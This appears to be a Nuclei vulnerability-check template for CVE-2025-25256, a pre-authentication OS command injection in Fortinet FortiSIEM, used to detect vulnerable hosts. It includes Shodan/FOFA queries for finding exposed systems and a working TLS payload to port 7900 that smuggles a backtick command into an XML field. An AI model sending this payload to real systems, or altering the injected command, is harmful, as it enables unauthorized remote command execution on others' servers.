id: CVE-2025-25256 info: name: Fortinet FortiSIEM - OS Command Injection severity: critical author: watchtowr,darses description: | Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely. impact: | Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise. remediation: | Update to the latest version beyond 7.3.1. classification: cve-id: CVE-2025-25256 cwe-id: CWE-78 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" cvss-score: 9.8 epss-percentile: 0.9735 epss-score: 0.39021 cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* metadata: vendor: fortinet product: fortisiem shodan-query: - http.favicon.hash:-1341442175 - http.html:"var hst = location.hostname" fofa-query: - icon_hash="-1341442175" - body="var hst = location.hostname" reference: - https://www.fortiguard.com/psirt/FG-IR-25-152 - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256 - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/ tags: cve,cve2025,rce,network,tcp,fortinet,vkev,vuln variables: xml: | nfs 127.0.0.1 `echo${IFS}/` local payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}" tcp: - inputs: - data: "{{payload}}" host: - "tls://{{Hostname}}" port: 7900 read-size: 1024 matchers: - type: word part: raw words: - "\x01\x00\x00\x00" # digest: 4a0a00473045022100be27a144311432bd6f50406c5fe8443f636ba91877f87c96ed9baba707ed03af02201b7aef1bd0c97a83d5c59008b15182b1454504a1bf991bfd77b0f5da49a72d42:922c64590222798bb761d5b6d8e72950